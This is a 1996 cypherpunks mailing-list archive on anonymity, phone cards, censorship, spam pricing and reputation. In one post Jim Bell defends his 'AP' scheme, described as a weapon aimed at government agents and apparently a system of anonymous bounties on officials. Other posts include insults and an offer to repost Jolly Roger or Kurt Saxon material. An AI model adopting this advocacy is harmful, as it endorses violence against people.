-- as can traceability, especially in/by repressive regimes. Therefore I would favor allowing anonymous purchases and sales of goods -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (There go the flea markets and garage sales (for buyers), which are largely anonymous. There goes walking into a store and paying cash for a piece of pipe (could be made into a bomb). There goes cash, period. See next item.) A version for cash: "Cash can be dangerous [illegal purchases, drugs, prostitution, tax evasion, illegal workers, extortion, etc.] -- as can traceable money, especially in/by repressive regimes. Therefore I would favor allowing cash -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." (One has to presume that Dyson would probably not support Chaumian untraceable e-cash, though I doubt she would go for the other examples.) And so on. One can take Dyson's basic argument for why anonymity may be dangerous at times and why it may need to be restricted, limited, or banned, and use these arguments for a variety of other basic freedoms. Essentially, freedom can be dangerous. The world can be dangerous. In fact, it is. (No, Dyson has not called for such restrictions on freedom of movement, freedom of association, freedom to read anonymously. But her argument that she would support anonymity if some form of traceability is built in essentially applies, by the same logic (that it can be dangerous) to a wide variety of other cases.) To summarize: "The Bill of Rights can be dangerous...." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jbugden at smtplink.alis.ca Fri Sep 6 14:39:54 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 7 Sep 1996 05:39:54 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactl Message-ID: <9608068420.AA842043614@smtplink.alis.ca> Audit trails may now be in place, in which case the cost of anonymity is increased to the cost of the lowest denomination card. Think OTP. However, in both Britain and France I have seen defective phones that allowed LD calls but did not deduct the call amount from the card. Obviously, the effect was free LD and these phones were perpetually busy. If audit trails were in place, this problem should have been noticed quickly. As I said, things may have changed for newer systems. James ---------- From: Flying insect killer Sent: Friday, September 06, 1996 1:20 PM To: jimbell at pacifier.com Cc: James Bugden; pstira at escape.com; cypherpunks at toad.com Subject: Re: Anonymous phone calls (was: What is the EFF doing exactl On Fri, 6 Sep 1996, jim bell wrote: > At 10:08 AM 9/6/96 EST, jbugden at smtplink.alis.ca wrote: > >There is another spin possible on the reasons for replacement of pay phones with > >credit card phones. In Canada all new credit card phones are also able to take > >phone cards (which are anonymous). > > Don't be too sure about the "anonymity" of these cards. You don't have to > give your name when you buy or use them, but assuming a large number of > phone calls (to, from different locations) can be associated together after > the fact, your name can probably be fairly easily obtained. 
> Jim Bell > jimbell at pacifier.com And phone companies that offer phone cards keep track of every call that goes thru each card number. From stewarts at ix.netcom.com Fri Sep 6 14:51:15 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Sat, 7 Sep 1996 05:51:15 +0800 Subject: Anonymous Payphones Re: What is the EFF doing exactly? Message-ID: <199609061807.OAA15460@attrh1.attrh.att.com> At 01:31 AM 9/6/96 -0400, "" wrote: >Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there >are less and less payphones, and all new ones installed, just about, are >those yellow credit card phones. That's not a big problem - you can buy telephone credit cards, anonymously, in your local convenience store. Around here you've got a choice of cards where the announcements are in Spanish and the rates to call Mexico are cheap, cards that come in exact $20 from machines that don't give change, cards with pretty pictures on the front, cards with advertising, etc., as well as cards that are reusable and want some personal information about you to activate. I don't blame phone companies in New York for using non-coin-phones, especially non-monopoly phone companies. Collecting and handling coins is expensive, phones get vandalized to steal the coins, it's harder to change your rates when you need to go to each phone to do it, and people get annoyed at coin phones that charge higher than Bell prices. What I do get annoyed about is that most pay phones won't accept calls, they'll only initiate them. This means that if you call somebody from a pay phone who only has a beeper, or if you don't have a beeper, you can't leave them a useful message to call you back. 
Part of this is done because of the Great Drug Hysteria, but I suspect part of it is that pay phone companies don't make money receiving calls, so they don't want to tie up their phones doing that; perhaps if they charged money to receive calls as well as initiate them, they'd be willing to receive calls? Not all of them, but it's now one for >one, at least. > >=Millie= >PS: i wrote a fiction book about this a few years ago -- i should have >published. People could've said i was the next nostradamus. :( # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From paul at fatmans.demon.co.uk Fri Sep 6 15:38:58 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sat, 7 Sep 1996 06:38:58 +0800 Subject: Cypherpunk meeting? Message-ID: <842032190.16862.0@fatmans.demon.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hi all, I`m just dashing off a quick note to see how many south eastern UK cypherpunks there are here, preferably in the sussex area, I might organise a meet if we can get enough people to make it worthwhile mail me if you are an experienced cryptographer in the area and would be interested in attending an informal meeting for key signing, discussion and copious beer.... 
;-) Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From grafolog at netcom.com Fri Sep 6 15:40:05 1996 From: grafolog at netcom.com (jonathon) Date: Sat, 7 Sep 1996 06:40:05 +0800 Subject: Race Bit: C In-Reply-To: <199609061750.KAA06787@mail.pacifier.com> Message-ID: On Fri, 6 Sep 1996, jim bell wrote: > At 05:05 AM 9/6/96 +0000, jonathon wrote: > used to test out hypotheticals, for example a "SimEconomy." For example, They are very hard to program, and the ones that do exist are based on the usually flawed assumptions that the designers make. EG: taxation is a requirement for government stability > I, for one, would love to be able to program in an immediate 25%+ reduction > computer-based simulation wouldn't just blindly do the cuts, but would also > estimate the secondary and tertiary effects of such cuts, for example Those are very hard to figure out in advance. Silicon Valley, for one, developed because the government closed several military facilities there. Other examples do exist. 
<< I think it was CATO that published a paper showing that closing military bases caused a short term impact in business, but three to five years later, more business, and with greater diversification, than had the military base stayed. However, such development does not occur, when local government authorities do not permit it to happen -- which is the usual state of affairs. << Can a simulation program put cover the situation where a government cries out for more development, and then prohibits it? That is exactly what most city governments do, and some state governments are starting to do. >> > if the average citizen were made aware of how simple the changes were, he'd > be less tolerant of special-interest politics. The average voter doesn't see any further than the bribe s/he is paid by whichever criminal is trying to inflict his/her mode of destruction on them, come the second tuesday of november. xan jonathon grafolog at netcom.com All people in the employ of government agencies are death-dealers. From qut at netcom.com Fri Sep 6 16:05:09 1996 From: qut at netcom.com (Dave Harman OBC) Date: Sat, 7 Sep 1996 07:05:09 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: Message-ID: <199609061850.LAA17248@netcom6.netcom.com> ! At 8:18 AM 9/6/96, tank wrote: ! >Please forward: ! ! > * * * P R E S S R E L E A S E * * * ! > ! > ! >GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES ! > ! > ! >German internetproviders, joined in the Internet Content Taskforce ! >(ICTF), started censoring the Dutch website www.xs4all.nl, containing ! >3100 personal and commercial homepages. This act of censorship is ! >caused by the webpage of a magazine that is banned in Germany, Radikal ! >(http://www.xs4all.nl/ ~tank/radikal/). ! ... ! ! Though my German friends will perhaps feel I am picking on them, this is ! not so (this week Germany is in the hot seat, last week it was ! Singapore....). ! ! A Modest Proposal: ! ! 
* as Germany is bent on blocking sites which carry this subversive ! pamphlet, "Radikal," let us mirror it on thousands of sites around the ! world. ! ! * when the Germans went into Danmark and insisted Jews wear badges, ! ordinary citizens (and the Danish Royal Family, as I recall) also took to ! wearing these Star of David badges. ! ! * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now ! attached to so many pages were to be joined by a "Star of David"? This Star ! of David symbol could mean "We support freedom to read, and our site ! contains the "Radikal" publication which Germans are forbidden to access." ! ! (I know nothing of how such symbolic campaigns are actually launched and ! managed, so I'm suggesting the hint of an idea. I do think mirroring the ! banned publication (_any_ banned publication, by _any_ government) on as ! many sites as possible is a Good Idea.) Can someone post an uncensored copy here? That's a good start. I could repost Jolly Roger which I think I archived, or post something from Kurt Saxon in de.soc and soc.culture.german for a good start! From qut at netcom.com Fri Sep 6 16:07:33 1996 From: qut at netcom.com (Dave Harman OBC) Date: Sat, 7 Sep 1996 07:07:33 +0800 Subject: [DREK] Neo-Nazis etc. In-Reply-To: <199609061711.NAA05404@charon.gti.net> Message-ID: <199609061843.LAA16712@netcom6.netcom.com> ! : Try to keep in mind that "Nazis" aren't skinheads and other ! : troublemakers exactly, which is to say, those are the first people ! : Hitler got rid of when he came to power. ! : ! : Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we ! : know anyone like that? ! : ! ! Reminded me of the following: ! ! "You think swastikas are cool. ! The real Nazis run your school; ! They're coaches, businessmen, and cops. ! In a real Fourth Reich, you'd be the first to go." Tim May is the Nazi of this list, Mitch Kapor is the Nazi of EFF and Bill Clinton is the Nazi of the USA. Thank you. 
From dthorn at gte.net Fri Sep 6 16:12:08 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 7 Sep 1996 07:12:08 +0800 Subject: Doing away with govt. people Message-ID: <323077F5.4DF7@gte.net> Gee, if we could just prosecute "the govt." under auspices of the "three strikes" legislation: Gehlen Deal MK/ULTRA "That 'Bay of Pigs' thing" ZR/RIFLE Watergate MH/CHAOS Iran/Contra Phoenix Program BCCI/BNL COINTELPRO INSLAW Waco, etc. Just say "Three strikes and you're (what?)" From dee at cybercash.com Fri Sep 6 16:18:25 1996 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Sat, 7 Sep 1996 07:18:25 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: <199609061745.KAA09285@scn.org> Message-ID: Of course, as you say, security needs to be improved also. See draft-eastlake-muse-00.txt in the IETF shadow directories. Donald On Fri, 6 Sep 1996, SCN User wrote: > Date: Fri, 6 Sep 1996 10:45:57 -0700 (PDT) > From: SCN User > To: dee at cybercash.com > Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd) > > > > >Suggest you look at draft-eastlake-internet-payment-*.txt in the > >IETF shadow directories. I don't think any one step will solve all > >our spam problems but I wouldn't mind spending, say, 5 cents for each > >real piece of mail I sent outside my company and if end machines charged > > >5 cents per piece of outside mail received, I think spamming would be > >crippled. (Note that with bad guy lists, you could collect the money and > >then just throw away the mail.) > Why should I pay for mail I can't control? > > Before charges like this can be implemented, protocols/security/etc > need to be improved to accurately identify the sender. > > > -- > ------------------------------------------ > There are no facts, only interpretations. > I always wanted to be somebody, but I should have been more specific. > Food for thought is no substitute for the real thing. 
> ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) http://www.cybercash.com http://www.eff.org/blueribbon.html From frissell at panix.com Fri Sep 6 16:24:29 1996 From: frissell at panix.com (Duncan Frissell) Date: Sat, 7 Sep 1996 07:24:29 +0800 Subject: electronic offshore banking Message-ID: <2.2.32.19960906192055.008a61e0@panix.com> At 07:25 PM 9/6/96 +0300, Jüri Kaljundi wrote: > >Are there any good offshore banks that would allow you to use your account >over the Internet? > >I know European Union Bank www.eub.com is one of those available, but their >US$ 25.000 minimum deposit is too stupid. > >Jüri Kaljundi >AS Stallion >jk at stallion.ee > > Does Compuserve count as the Internet? It soon will be the Internet since they are dropping their proprietary software. TSB (including TSB's Jersey subsidiary) has a new net-based banking arrangement using Compuserve. See the TSB web site http://www.tsb.co.uk/pcbank.htm or Compuserve (GO TSB). TSB in Jersey (or predecessor institutions) has been there since the 1820s or so. DCF From dee at cybercash.com Fri Sep 6 16:27:39 1996 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Sat, 7 Sep 1996 07:27:39 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: <9609061904.AA00879@ch1d157nwk> Message-ID: No, I wouldn't be willing to pay $50.00 to have sent that message to cypherpunks. But I would certainly have been willing to pay some smaller non-zero amount, like a dollar (and then there is the question of the entities I blind copied it to ...). But I never claimed that charging was the answer to everything or compatible with the cypherpunks anarchy. It just seems like a useful tool to have available. 
Based on (hopefully secure) message characteristics, you want to encourage some mail and probably give it extra priority, other mail you might want to charge a penny or two for, and known junk sources you want to charge as much as you can and then trash the mail. Probably remailers should sign messages so you can easily configure to let their mail in if you want to get it. But there should still be appropriate social and legal action against network abusers as well. Donald On Fri, 6 Sep 1996, Andrew Loewenstern wrote: > Date: Fri, 6 Sep 96 14:04:51 -0500 > From: Andrew Loewenstern > To: "Donald E. Eastlake 3rd" > Cc: cypherpunks at toad.com > Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd) > > Donald Eastlake writes: > > I don't think any one step will solve all our spam problems > > but I wouldn't mind spending, say, 5 cents for each real piece > > of mail I sent outside my company and if end machines charged > > 5 cents per piece of outside mail received, I think spamming > > would be crippled. (Note that with bad guy lists, you could > > collect the money and then just throw away the mail.) > > So would you be willing to pay $50.00 for this message you sent to > cypherpunks? If there are a thousand recipients and each one charges $0.05 > for the privilege of you sending it e-mail.... It seems like such a scheme > would not only cripple spam, but public discussion lists like this one. > > > andrew > ===================================================================== Donald E. 
Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) http://www.cybercash.com http://www.eff.org/blueribbon.html From andrew_loewenstern at il.us.swissbank.com Fri Sep 6 16:39:15 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Sat, 7 Sep 1996 07:39:15 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: Message-ID: <9609061904.AA00879@ch1d157nwk> Donald Eastlake writes: > I don't think any one step will solve all our spam problems > but I wouldn't mind spending, say, 5 cents for each real piece > of mail I sent outside my company and if end machines charged > 5 cents per piece of outside mail received, I think spamming > would be crippled. (Note that with bad guy lists, you could > collect the money and then just throw away the mail.) So would you be willing to pay $50.00 for this message you sent to cypherpunks? If there are a thousand recipients and each one charges $0.05 for the privilege of you sending it e-mail.... It seems like such a scheme would not only cripple spam, but public discussion lists like this one. andrew From pgruber at netzone.com Fri Sep 6 16:48:50 1996 From: pgruber at netzone.com (Pete Gruber) Date: Sat, 7 Sep 1996 07:48:50 +0800 Subject: Factory Memory Message-ID: <199609061547.IAA01621@nz1.netzone.com> Memory prices have finally stabilized after serious price drops since the beginning of this year. With Christmas demand high for electronic gadgets, memory supply is dwindling and higher prices are sure to follow. Now is a good time to upgrade memory to satisfy those memory hungry software packages. We are able to offer memory 72 pin, 70ns non-parity, SIMM memory boards at: 32 mb=$221 16 mb=$89.99 8 mb=$39.99 4 mb=$19.99 MANY more styles, sizes, speeds, are available. 
Check out our website - http://www.gruber.com for a complete list, or call us at 800 658-5883 Toll free or (602) 863-2655 for more details. Thank you Jillene Barr Gruber Industries Incorporated From tcmay at got.net Fri Sep 6 16:58:50 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 07:58:50 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones Message-ID: At 6:08 PM 9/6/96, stewarts at ix.netcom.com wrote: >is done because of the Great Drug Hysteria, but I suspect part of it >is that pay phone companies don't make money receiving calls, >so they don't want to tie up their phones doing that; perhaps if >they charged money to receive calls as well as initiate them, >they'd be willing to receive calls? I am about to start worrying about "junk phone calls" more so than I have been. I just bit the bullet and bought a digital cellular phone, with a nifty rate plan called Digital Flex: I get unlimited free airtime from 7 p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south of Salinas to north of Santa Rosa and as far east as the Central Valley. In other words, the entire Bay Area and outlying communities. I can send and receive calls over this entire region, from anywhere in the region (of course), without any charges. The downside is that calls _from_ or _to_ my phone during "business" hours are charged 42 cents a minute, airtime (tying up a channel and all), plus whatever other fees may be applicable at each end. Thus, every "junk call" I get trying to get me to buy aluminum siding, or to vote Democratic, or to switch my long-distance carrier (!), costs me a minimum of 42 cents, depending on how fast I can realize who they are and get rid of them ("Let me forward you to Jim Bell's AP hotline..."). Needless to say, my cellular number is only going out to a handful of folks, and with recommendations that they not call me during business hours unless it's urgent. I believe this kind of pricing model is likely to be common. 
We can debate til the cows come home whether flat rate pricing makes sense, for ISPs, for cellphones, for other things. Relevance to Crypto? The "junk e-mail" issue, calls for regulations (which I'm against), technological solutions (Caller ID lets users decide to accept a call or not....same idea could be used with e-mail, a la Hal Finney's "You have a message of size X from size Y entitled Z" proposal for positive acceptance of remailed messages), and the value of True Names (and True Numbers). I'll be real pissed if my new cellphone number ends up in the hands of mass marketers, given that I don't plan to give it out to merchants, to organizations, etc. (I'm probably inviting malicious use by one of my enemies here on this list...there may be ways I don't yet grok to "look up" cellphone user numbers. I can then get hit with denial-of-service attack just by having this 42 cents a call situation. I hope no one is this malicious.) P.S. The phone is a Motorola Micro Digital Lite, a little bugger with a zillion features. It can vibrate silently instead of ringing (phone sex?), it can store 100 alphanumeric name/number combinations, it even has a data port for use with a modem (probably a special modem, and certainly a chore to set all the battery-powered stuff up properly...I'll report on it if it works). The cost was about $200 for the phone, after the rebates, kickbacks, etc., and after "sales tax on the pre-kickback price" was added back in (California has a tax collection scam where sales tax is assessed against the "real" price of some good or service....imagine the possibilities if this is extended to cover other such areas). The "Digital Flex" plan from Cellular One is $20/mo for the basic plan, and then $15/mo on top of that for the unlimited evenings and weekends use. (This could easily save me the amount I often spend in a month just yakking with friends and girlfriends who live over the hill in the Valley.) These rates have really come down a lot. 
The unlimited calls is what sold me. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Fri Sep 6 17:10:39 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 08:10:39 +0800 Subject: Subject: Re: Race Bit: C Message-ID: <199609062013.NAA05932@mail.pacifier.com> At 02:31 PM 9/5/96 -0600, Anonymous wrote: >> If I understand you correctly, it is OK for a government to >> institute violence against the residents of the land it claims >> dominion over, but it is not acceptable for the inhabitants of >> that piece of land to respond in self defence. > >I will say this: > >No, government initiation of violence (such as in Waco, Ruby Ridge, etc.) is not OK, >and AsPol initiation of violence is not either. This can lead into a long argument about >just _when_ violence is initiated, where opinion is more important than fact, but IMO: > >Randy Weaver was not initiating violence. >David Keresh was not initiating violence. >Pot growers and smokers are not initiating violence. No argument here... > But >Mr. Bell, if he follows through on his scheme, *will* be initiating violence. His scheme, >while it can sound tempting (especially every April 15th!) has no guarantee that it will >_only_ be used against the Lon Horiuchis of our government, Life generally doesn't come equipped with any guarantees. Some people object to private ownership of guns, on a similar theory that "there is no guarantee they won't be used against innocent people." 
Others (most of us?), particularly libertarians challenge this, pointing out that it is the abuse of a right which should be punished, rather than curtailing a right simply because a small minority abuse it. To the extent we believe the latter argument, we are accepting the idea that a "guarantee" is not necessary. AP, ultimately, is a tool that can be used well or used badly. I advocate using it well. >in fact, it may be said it >is not guaranteed to not be used against Mr. Bell himself, as many have joked. Check out what I wrote at the end of AP part 7: "Terror, too, because this system may just change almost EVERYTHING how we think about our current society, and even more for myself personally, the knowledge that there may some day be a large body of wealthy people who are thrown off their current positions of control of the world's governments, and the very-real possibility that they may look for a "villain" to blame for their downfall. They will find one, in me, and at that time they will have the money and (thanks to me, at least partially) the means to see their revenge. But I would not have published this essay if I had been unwilling to accept the risk." Long before I started publicizing AP, I had made my decision. > There are two roads to take in life, convincing and coercing others. > I think that the former is still possible, Mr. Bell and many others disagree. In a quote attributed to Al Capone, he said something like, "You can get more with a kind word and a gun, than you can with a kind word alone." Capone was probably talking about offense, but the principle is even more applicable to _defense_: If you have a gun, you can prevent somebody else from coercing you, and ensure that they have to CONVINCE you! AP is like a gun which can be aimed at the agents of the majority, to prevent them from violating the rights of the minority. 
> I worry that abuse of the very young >and weak (for now) anonymity system for the purpose of initiating, rather than exposing, >violence will lead to more government violence than we already have. First, AP only "initiates" if it is used against people who have not, themselves, initiated force or fraud. I contend that while this is not impossible, it is improbable. If you choose a target that "everyone" else agrees has initiated force, you'll only have to cough up a dollar, or a quarter, or even a dime and you'll all get your wish. Randomly select a guiltless individual and you'll be the only one paying, not to mention the fact that you might have trouble finding an AP organization that'll take your malicious donation. This translates into: "They'll exist, but due to lack of competition they'll be able to insist on taking a healthy cut of their own." In addition, if you attempt to use AP against somebody who already knows it's probably you (say, an ex business partner you just ripped off?), its anonymity won't be much use. > Perhaps I am >wrong and there is no hope; but if so, that means another revolution. Revolutions are >very romantic sounding, to those who have not been in a war. The whole point of crypto-anarchy is that revolutions are CHANGING. Think of a revolution like an earthquake: It's the sudden release of stress built up over years or decades. In an earthquake, if that release could be spread out from the seconds or minute it normally takes, to hours or even days (or better yet, continuously) the amplitude would be far smaller and you probably wouldn't even notice it. Likewise, politically, the only reason you get revolutions is because political leadership gets entrenched and resists change. Even in democracy, which is supposed to facilitate changes, eventually the politicians learn to play one group off another, leading to the same kind of social stratification problems that even dictatorships have. 
Jim Bell jimbell at pacifier.com From janzen at idacom.hp.com Fri Sep 6 17:36:50 1996 From: janzen at idacom.hp.com (Martin Janzen) Date: Sat, 7 Sep 1996 08:36:50 +0800 Subject: Reputations Message-ID: <9609062100.AA29557@sabel.idacom.hp.com> TCM> I strongly disagree. It's quite possible for Person A to quickly convert TCM> his reputation to Person B to a _negative_ value. Real quick, in fact. GB>I don't see how there can be such a thing as negative reputation GB>capital. Wouldn't that mean B believes the opposite of what A says? B wouldn't necessarily believe the _opposite_, but if R(A,B) is negative, then B would treat whatever A says with greater skepticism. ("Consider the source.") Alternatively, R(A,B) << 0 might mean that B has decided that A's posts tend not to be worth even the time it takes to read them, and has set his killfile accordingly. (Think of someone who makes unsupported assertions: this is not a reason to believe the _opposite_ of what he says, but to ignore him.) GA>If you anti-believed someone in a consistent manner, couldn't they exploit GA>that? Sure; see any number of Cold War spy novels for examples. One point that I think deserves mention, but that I haven't seen yet in this thread, is that R(A,B) is contextual; it should be R(A,B,subject). To accept the word of an authority outside his area of expertise is a common logical fallacy. (Think of political endorsements by famous actors.) Conversely, so is dismissing something just because its proponent has a negative reputation in another context. (At the risk of flirting with Godwin's law, an example might be that just because a certain well-known evil person liked Karl May novels and music by Wagner, this does not in itself make these things bad.) GB>For instance, when a certain infamously-low-reputation (deservedly so) GB>individual recently joined the cypherpunk lists, others who had endured GB>him in the past tried to relay their impressions of him. 
It proved very GB>difficult to convey, and they were somewhat attacked for their efforts GB>and not entirely believed. GB> GB>In other words, he *could not* spend down to 0, despite years of GB>unflagging effort. I'd interpret this situation a bit differently. In the eyes of many list members, this individual _did_ spend down to 0 -- and below, I'd argue, based on the number of people who announced changes to their killfiles. But this was because of his actions on the list; it was _not_ because of the impressions of others. Most of the regulars on this list are, IMHO, logical enough thinkers, and of sufficiently independent mind (to put it mildly), to wait and see for themselves. Results in other, more conformist or authoritarian groups may vary... In other words, it would appear that "reputation capital" is difficult to create or destroy based only on the word of others; it has to be earned. (Hmm, is it easier to destroy than to create -- are we more likely to adjust our R(A,me) score downward based on what others say about A?) TCM?> But TCM?> what if the American Heart Association publishes a detailed study on the TCM?> fat levels of MacDonald's products and declares it to "Dangerous." The TCM?> effect will probably be greater, as R (AHA, many people) = high, and by the TCM?> kind of Dempster-Shafer belief calculus I discussed a few months ago, the TCM?> rep of the AHA propagates semi-transitively to the rep of MacDonald's. TCM?> TCM?> (This all happened recently, with the famous studies of fat levels of movie TCM?> theater food...sales dropped almost overnight, and now the fat levels of TCM?> popcorn, etc., have been changed for the better.) I agree with the first paragraph; however, I'm not sure that the second paragraph gives an example of this. The high levels of saturated fats in movie popcorn were (as I recall) publicized by the previously little- known "Center for Science in the Public Interest", a group with nowhere near the reputation capital of the AHA. 
Their claims were taken seriously, not because the group itself was particularly reputable, but because the results were dramatic and easily verified. A better example might be that of Surgeon-General Koop vs. the tobacco companies. GB>I've already made the points I wanted to make, so I may not have further GB>comments. TCM>Nor me. Well, I've probably said enough, then, especially considering that no one is paying attention any longer. Wouldn't want excess verbiage to lower what little reputation capital I may have here... :-) -- Martin Janzen janzen at idacom.hp.com From declan at well.com Fri Sep 6 17:37:05 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 08:37:05 +0800 Subject: Global Alert -- Hysteria in the U.K. threatens Net Message-ID: [For more details and background, check out http://www.eff.org/~declan/global/ and http://www.hotwired.com/netizen/96/36/index4a.html for my U.K. cyberporn fearstorm piece. --Declan] September 6, 1996 *** GLOBAL ACTION ALERT *** FOR IMMEDIATE RELEASE - Please redistribute this document widely with this banner intact - Redistribute only in appropriate places & only until 30 September 1996 Global Alert: Hysteria in the UK Threatens Free Speech on the Net The Sunday, August 25 issue of the London Observer splashed across its front page a sensationalized account of child pornography on the Internet, falsely accusing two Internet Service Providers, Clive Feather of Demon UK (a full service site) and Johan Helsingius of anon.penet.fi (an anonymous remailer) of involvement in the distribution of child pornography. Why were these accusations made? Demon UK had refused to remove a broad range of sexually-oriented newsgroups identified by UK authorities as possible sources of child pornography, and anon.penet.fi was identified without substantiation as a source for `90% of child pornography on the Internet.' 
In fact, Demon UK was simply acknowledging that Internet Service Providers (ISPs) cannot police the data that traverses their systems, or assume responsibility for it, any more than the post office can assume responsibility for content that is sent through traditional mail. And Helsingius, contrary to allegations in the London Observer, had long before restricted the size of files that could be transferred through anon.penet.fi, effectively eliminating the possibility that binary files containing pictures could be exchanged. This story was extreme, but not without precedent: much has been written associating the Internet with those who make and distribute child porn, and there have been many attempts to hold ISPs responsible for objectionable or illegal content. ISPs are not content providers; they channel content provided by their users. It is outside the scope of the ISP to monitor, evaluate, and attempt to remove objectionable content. In fact, any attempt by an ISP to block particular kinds of content will ultimately be fruitless, as providers of that content will simply find alternate channels of distribution. Moreover, it is wrong to assume that the Internet has no rules, and is friendly to the exchange of objectionable materials. In fact the Internet is a `virtual community' of users with a distinct culture incorporating diverse views but finding consensus in opposition to censorship and access control. There is also strong opposition to the exploitation of children; in fact, many Internet users have cooperated in attempts to identify those who create and distribute child pornography. Summary: The physical abuse and exploitation of children is a very real problem demanding a proactive response, however we vigorously oppose attempts to stifle the free and open exchange of information over the Internet in the mistaken belief that overbroad restrictions on the flow of information will protect children from abuse. 
We support Demon UK and anon.penet.fi (which Helsingius has shut down), and deplore the Observer's lurid attempt to make respectable Internet providers the "cause" of a problem for which they have no responsibility. The Observer story is not the first of its kind: it represents an ongoing confusion about a complex new medium. Unfortunately this misunderstanding has become a global problem, represented in proposed or enacted restrictive legislation as well as negative press. Consider these possible analogies to the Internet: - The Internet is a vast mail system, like a post office. Would you favor a law that required postal authorities to open each piece of mail and evaluate its acceptability? - The Internet is a huge library system. Would you favor a law that would restrict information a library can provide? - The Internet is a collection of virtual communities. Would you favor a law that required routine searches of your community? Our position: These measures constrain everyone because of the misdeeds of a few. It is more sensible to find and deal with the sources of child pornography than to impede the flow of data over the Internet. The imposition of censorship and additional constraints applied to ISPs will not solve the existing problem, but will create a new problem, a barrier to the free and democratic exchange of ideas. 
For background on global privacy and liberty issues: http://www.eff.org/~declan/global/ For press contacts, and for more information about the Internet, see homepages for the signatories to this message: ALCEI - Electronic Frontiers Italy * http://www.nexus.it/alcei.html CITADEL - Electronic Frontier France * pforsans at in-net.inba.fr CommUnity (UK) * http://www.community.org.uk EFF (USA) * http://www.eff.org EFF-Austin (USA) * http://www.eff-austin.org Electronic Frontier Canada * http://www.efc.ca/ Electronic Frontiers Australia * http://www.efa.org.au/ Electronic Frontiers Houston (USA) * http://www.efh.org Elektronisk Forpost Norge (Electronic Frontier Norway) * http://www.sn.no/~efn Fronteras Electronicas Espan~a (Electronic Frontiers Spain) * http://www.lander.es/~jlmartin/ HotWired * http://www.hotwired.com/ ### From aba at dcs.ex.ac.uk Fri Sep 6 17:41:39 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 7 Sep 1996 08:41:39 +0800 Subject: Job for netescrow ? (was Secure anonymouse server protocol... In-Reply-To: <9609051155.AA14504@clare.risley.aeat.co.uk> Message-ID: <199609061322.OAA01150@server.test.net> Peter Allan writes on cpunks: > In the talk about replyable nym-mailers I haven't > yet seen netescrow mentioned. > > You DID all read this ? > > [Matt Blazes Oblivious Key Escrow paper] > > This all hinges on a policy to be followed by archive holders defining > the conditions under which they release their shares. > This could be receipt of a signed request from the owner (remailer). > > Maybe the table relating nyms to reply addresses could be stored in > netescrow style so that captured remailers reveal nothing. The problem > of operator coercion is not addressed by this. Just to clarify, if I understand correctly you are proposing a penet style system with the database held in `netescrow'. The remailer in normal operation has access to the database by making requests satisfying the conditions of the secret share holders. 
